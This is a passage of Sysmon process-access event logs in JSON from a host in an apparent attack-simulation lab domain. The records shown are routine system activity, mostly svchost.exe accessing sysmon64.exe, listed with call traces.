EventAggregation.dll+3ea1|c:\\windows\\system32\\EventAggregation.dll+36c9|c:\\windows\\system32\\EventAggregation.dll+332f|c:\\windows\\system32\\EventAggregation.dll+2e28|C:\\Windows\\SYSTEM32\\ntdll.dll+64ed5|C:\\Windows\\SYSTEM32\\ntdll.dll+64bdd|C:\\Windows\\SYSTEM32\\ntdll.dll+64a40|C:\\Windows\\SYSTEM32\\ntdll.dll+45b70|C:\\Windows\\SYSTEM32\\ntdll.dll+2a073|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2671,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:30.357\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01F2-5F25-0000-00101ED30400}\r\nTargetProcessId: 4988\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:30.357","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01F2-5F25-0000-00101ED30400}","TargetProcessId":"4988","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:47:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2672,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:30.357\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:30.357","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2673,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:30.357\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:30.357","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2674,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:30.357\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:30.357","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2675,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:30.357\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:30.357","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2676,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:30.357\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:30.357","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2677,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:30.357\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:30.357","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2678,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:30.357\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:30.357","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2679,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:30.357\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 